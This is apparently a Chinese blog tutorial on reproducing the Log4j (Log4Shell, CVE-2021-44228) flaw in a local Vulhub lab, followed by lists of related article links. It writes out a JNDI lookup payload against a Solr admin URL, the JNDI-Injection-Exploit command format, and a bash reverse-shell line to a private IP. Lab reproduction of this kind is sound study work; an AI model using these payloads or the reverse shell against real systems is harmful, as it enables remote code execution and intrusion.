利用Vulhub复现log4j漏洞
Vulhub 搭建log4j漏洞环境,模拟攻击:
靶机:
首先进入log4j路径
cd vulhub/log4j/CVE-2021-44228/
搭建环境
sudo docker-compose buildsudo docker-compose up -d
网址输入:http://127.0.0.1:8983/admin/cores
在DNSlog网站生成域名:jkvl0r.dnslog.cn
输入http://127.0.0.1:8983/admin/cores?action=${jndi:ldap://${sys:java.version}.jkvl0r.dnslog.cn}
可以看到:
可以看到Java的版本被输出,测试具有漏洞
攻击:
应用工具JNDI-Injection-Exploit搭建服务:格式:
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "命令" -A "ip(攻击机)"
这里的命令是想要靶机运行的命令,-A后放的是发出攻击的电脑的ip,也是存放-C后“命令”的ip地址。
接下来要实现反弹shell,可以用命令
bash -i >& /dev/tcp/192.168.237.128/6666 0>&1
注意“命令”必须经过编码,不然将无法实现
──(root
利用Vulhub复现log4j漏洞相关推荐
- Vulhub复现fastison漏洞
目录 Vulhub复现fastison漏洞 0.fastison介绍 1.vulhub靶场安装 2.vulhub把场启动fastjson场景 3.可以用dnslog来测试是否有漏洞 4.攻击机kali ...
- 利用Vulnhub复现漏洞 - JBoss JMXInvokerServlet 反序列化漏洞
JBoss JMXInvokerServlet 反序列化漏洞 Vulnhub官方复现教程 漏洞原理 复现过程 启动环境 端口设置 浏览器设置 BurpSuit设置 复现漏洞 序列化数据生成 发送POC ...
- apache log4j漏洞复现
文章目录 1. Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645) 利用条件 利用 2. CVE-2019-17571 利用条件 利用 3. apache lo ...
- Log4j 漏洞复现
漏洞说明: 前端时间 出现这个漏洞,各大公司 安全部都去做相应的防护和修复措施,网上公开漏洞 poc 源码很少,只听到有,但是不知道怎么复现,于是在github 上搜索找了很多的源码,都不能复现.因为 ...
- 利用Vulnhub复现漏洞 - Atlassian Confluence 路径穿越与命令执行漏洞(CVE-2019-3396)
Atlassian Confluence 路径穿越与命令执行漏洞(CVE-2019-3396) Vulnhub官方复现教程 漏洞原理 复现漏洞 启动环境 漏洞复现 Vulnhub官方复现教程 http ...
- OpenShift Security (13) - 利用Log4j漏洞攻击容器
<OpenShift 4.x HOL教程汇总> 演示视频 利用 Log4j 漏洞攻击容器需要有2个条件,1)Java应用中包含受到漏洞影响的Log4j.2)带有"JNDI 注入& ...
- SSH协议弱加密算法漏洞的利用及复现(中间人攻击)
SSH协议弱加密算法漏洞的利用及复现(中间人攻击) SSH协议弱加密算法漏洞的利用及复现(中间人攻击) 很多服务器或者交换机是存在SSH协议弱加密算法漏洞的,但是该漏洞如何利用呢?最近研究了下此漏洞的 ...
- PHP文件包含漏洞(利用phpinfo)复现
漏洞简介: PHP文件包含漏洞中,如果找不到可以包含的文件,我们可以通过包含临时文件的方法来拿到权限.因为临时文件名是随机的,如果目标网站上存在phpinfo,则可以通过phpinfo来获取临时文件名 ...
- 网安大事件丨Fortinet对Apache Log4j漏洞利用的全面复盘与防御
起底Apache Log4j漏洞: 如何出现.如何被利用与如何防御 受影响平台: 任何使用Log4j2漏洞版本的应用程序和服务 受影响用户: 任何使用Log4j的具备该漏洞版本的组织 影响: 远程攻击 ...
最新文章
- Ubuntu 14.04 64位上安装wps office软件
- 谈谈Team Foundation Server Proxy
- 【今日互联网大事儿】聚美市值缩水一半
- 浏览器窗口的高度和宽度
- C/C++中 static 的作用
- html清楚css的影响,08、清除浮动的影响.html
- 用excel数据写入html,如何使用epplus将我的html表格写入excel文件
- WCF测试工具,post经验
- Angular通过CORS实现跨域方案
- matlab图像处理宝典 秦襄培,秦襄培
- 关于ODBC使用SQL语句和调用存储过程传递参数的使用方式说明
- ubuntu docker-compose: command not found
- 清空上传控件HtmlInputFile的方法
- 廖雪峰python3复习总结——day2-1
- 计算机一级考试wps教程视频教程,全国计算机等级考试一级WPS Office教程(2008年版)...
- android 单机地图,天地图app下载
- win7计算机无法远程桌面连接,解决win7无法被远程桌面连接教程
- 模块度Q——复杂网络社区划分评价标准
- 第五篇 《小强升职记》
- iOS开发之第三方登录微信-- 史上最全最新第三方登录微信方式实现
热门文章